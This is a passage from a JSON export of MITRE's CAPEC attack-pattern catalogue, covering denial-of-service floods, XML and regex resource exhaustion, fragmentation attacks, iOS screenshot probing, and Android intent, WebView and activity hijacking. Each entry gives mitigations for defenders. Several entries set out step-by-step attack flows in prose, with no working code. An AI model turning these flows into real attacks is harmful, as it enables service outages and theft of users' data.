Taxonomy_Mappings"}]}},"488":{"ID":"488","Name":"HTTP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server\'s resources. Since these are legitimate sessions this attack is very difficult to detect.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can monitor the typical traffic flow. When spikes in usage occur, filters could examine traffic for indicators of bad behavior with respect to the web servers, and then create firewall rules to deny the malicious IP addresses. These patterns in the filter could be a combination of trained behavior, knowledge of standards as they apply to the web server, known patterns, or anomaly detection. Firewalling source IPs works since the HTTP is sent using TCP so the source IP can\'t be spoofed; if the source IP is spoofed is, then it\'s not legitimate traffic. Special care should be taken care with rule sets to ensure low false positive rates along with a method at the application layer to allow a valid user to begin using the service again. Another possible solution is using 3rd party providers as they have experts, knowledge, experience, and resources to deal with the attack and mitigate it before hand or while it occurs. The best mitigation is preparation before an attack, but there is no bulletproof solution as with ample resources a brute force attack may succeed."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.002","Entry_Name":"Endpoint Denial of Service:Service Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"489":{"ID":"489","Name":"SSL Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.002","Entry_Name":"Endpoint Denial of Service:Service Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"490":{"ID":"490","Name":"Amplification","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn\'t blocked."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.002","Entry_Name":"Network Denial of Service:Reflection Amplification"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"491":{"ID":"491","Name":"Quadratic Data Expansion","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.","Alternate_Terms":{"Alternate_Term":{"Term":"XML Entity Expansion (XEE)"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"230"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] An adversary determines the input data stream that is being processed by a data parser that supports using substituion on the victim\'s side.","Technique":["Use an automated tool to record all instances of URLs to process requests.","Use a browser to manually explore the website and analyze how the application processes requests."]},{"Step":"2","Phase":"Exploit","Description":"[Craft malicious payload] The adversary crafts malicious message containing nested quadratic expansion that completely uses up available server resource."},{"Step":"3","Phase":"Exploit","Description":"[Send the message] Send the malicious crafted message to the target URL."}]},"Prerequisites":{"Prerequisite":"This type of attack requires a server that accepts serialization data which supports substitution and parses the data."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"Denial of Service"}},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.","Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources."]},"Example_Instances":{"Example":{"p":["In this example the attacker defines one large entity and refers to it many times.","This results in a relatively small message of 100KBs that will expand to a message in the GB range."],"div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative","em":["... [100K of them] ...","... [100K of them]..."]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites"}],"Previous_Entry_Name":["XML Quadratic Expansion",{"Date":"2021-10-21"}]}},"492":{"ID":"492","Name":"Regular Expression Exponential Blowup","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions. The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression."},"Mitigations":{"Mitigation":"Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"400"},{"CWE_ID":"1333"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Regular expression Denial of Service - ReDoS"}},"References":{"Reference":{"External_Reference_ID":"REF-421"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"493":{"ID":"493","Name":"SOAP Array Blowup","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message."},"Mitigations":{"Mitigation":"Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can\'t be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don\'t match drop the SOAP packet at the web service layer."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"References":{"Reference":{"External_Reference_ID":"REF-422"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"494":{"ID":"494","Name":"TCP Fragmentation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. The attacker attempts to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered. This behavior defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled. Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send TCP packets of arbitrary size with crafted data."},"Mitigations":{"Mitigation":"This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule \\"IF FO=1 and PROTOCOL=TCP then DROP PACKET\\" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"404"}]},"References":{"Reference":{"External_Reference_ID":"REF-423"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"495":{"ID":"495","Name":"UDP Fragmentation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data."},"Mitigations":{"Mitigation":"This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"404"}]},"References":{"Reference":{"External_Reference_ID":"REF-424"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"496":{"ID":"496","Name":"ICMP Fragmentation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target."},"Mitigations":{"Mitigation":"This attack may be mitigated through egress filtering based on ICMP payload so a network is a \\"good neighbor\\" to other networks. Bad IP implementations become patched, so using the proper version of a browser or OS is recommended."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"404"}]},"References":{"Reference":{"External_Reference_ID":"REF-425"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"497":{"ID":"497","Name":"File Discovery","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Very Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must know the location of these common key files."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Leverage file protection mechanisms to render these files accessible only to authorized parties."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1083","Entry_Name":"File and Directory Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-09-30"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Resources_Required"}]}},"498":{"ID":"498","Name":"Probe iOS Screenshots","Abstraction":"Detailed","Status":"Draft","Description":"An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. These images are used by iOS to aid in the visual transition between open applications and improve the user\'s experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"545","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window\'s hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods."},"References":{"Reference":{"External_Reference_ID":"REF-426","Section":"Chapter 11 : Page 285 : Application Screenshots"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Architectural_Paradigms, Related_Attack_Patterns, Technical_Context"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Probe Application Screenshots",{"Date":"2015-11-09"}]}},"499":{"ID":"499","Name":"Android Intent Intercept","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"117","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"514"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find an android application that uses implicit intents] Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents. They must also determine what the contents of the intents being sent are such that a malicious application can get sent these intents."},{"Step":"2","Phase":"Experiment","Description":"[Create a malicious app] The adversary must create a malicious android app meant to intercept implicit intents from a target application","Technique":"Specify the type of intent wished to be intercepted in the malicious app\'s manifest file using an intent filter"},{"Step":"3","Phase":"Experiment","Description":"[Get user to download malicious app] The adversary must get a user using the targeted app to download the malicious app by any means necessary"},{"Step":"4","Phase":"Exploit","Description":"[Intercept Implicit Intents] Once the malicious app is downloaded, the android device will forward any implicit intents from the target application to the malicious application, allowing the adversary to gaina access to the contents of the intent. The adversary can proceed with any attack using the contents of the intent.","Technique":["Block the intent from reaching the desired location, causing a denial of service","Gather sensitive information from the intercepted intent","Modify the contents of the intent and forward along to another application"]}]},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Resource Consumption"}]},"Mitigations":{"Mitigation":"To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"925"}},"References":{"Reference":{"External_Reference_ID":"REF-427","Section":"3.1 Unauthorized Intent Receipt"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Intent Intercept",{"Date":"2020-12-17"}]}},"500":{"ID":"500","Name":"WebView Injection","Abstraction":"Detailed","Status":"Draft","Description":"An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"253"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target web application] An adversary first needs to determine what web application they wish to target.","Technique":["Target web applications that require users to enter sensitive information.","Target web applications that an adversary wishes to operate on behalf of a logged in user."]},{"Step":"2","Phase":"Experiment","Description":"[Create malicious application] An adversary creates an application, often mobile, that incorporates a WebView component to display the targeted web application. This malicious application needs to downloaded by a user, so adversaries will make this application useful in some way.","Technique":["Create a 3rd party application that adds useful functionality to the targeted web application. Victims will download the application as a means of using the targeted web application.","Create a fun game that at some point directs a user to the targeted web application. For example, prompt the user to buy in game currency by directing them to PayPal."]},{"Step":"3","Phase":"Experiment","Description":"[Get the victim to download and run the application] An adversary needs to get the victim to willingly download and run the application.","Technique":["Pay for App Store advertisements","Promote the application on social media, either through accounts made by the adversary or by paying for other accounts to advertise."]},{"Step":"4","Phase":"Exploit","Description":"[Inject malicious code] Once the victim runs the malicious application and views the targeted web page in the WebView component, the malicious application will inject malicious JavaScript code into the web application. This is done by using WebView\'s loadURL() API, which can inject arbitrary JavaScript code into pages loaded by the WebView component with the same privileges. This is often done by adding a script tag to the document body with a src destination to a remote location that serves malicious JavaScript code.","Technique":["Execute operations on the targeted web page on behalf of an authenticated user.","Steal cookie information from the victim.","Add in extra fields to the DOM in an attempt to get a user to divulge sensitive information."]}]},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app."},"Mitigations":{"Mitigation":"The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed."},"References":{"Reference":{"External_Reference_ID":"REF-430"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"501":{"ID":"501","Name":"Android Activity Hijack","Abstraction":"Detailed","Status":"Draft","Description":"An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity\'s user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"499"},{"Nature":"ChildOf","CAPEC_ID":"173","Exclude_Related":{"Exclude_ID":"403"}}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find an android application that uses implicit intents] Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is."},{"Step":"2","Phase":"Experiment","Description":"[Create a malicious app] The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy\'s user interface to get the user to enter sensitive data.","Technique":"Specify the type of intent wished to be intercepted in the malicious app\'s manifest file using an intent filter"},{"Step":"3","Phase":"Experiment","Description":"[Get user to download malicious app] The adversary must get a user using the targeted app to download the malicious app by any means necessary"},{"Step":"4","Phase":"Exploit","Description":"[Gather sensitive data through malicious app] Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.","Technique":"Gather login information from a user using a malicious app"}]},"Prerequisites":{"Prerequisite":"The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity."},"Skills_Required":{"Skill":["The adversary must typically overcome network and host defenses in order to place malware on the system.",{"Level":"High"}]},"Resources_Required":{"Resource":"Malware capable of acting on the adversary\'s objectives."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An \'explicit intent\' is delivered to a specific application as declared within the intent, whereas an \'implicit intent\' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).","Never use implicit intents for inter-application communication."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"923"}},"References":{"Reference":{"External_Reference_ID":"REF-427","Section":"3.1.2 Activity Hijacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description, Prerequisites"},{"Modification_Name":"CAPEC Content 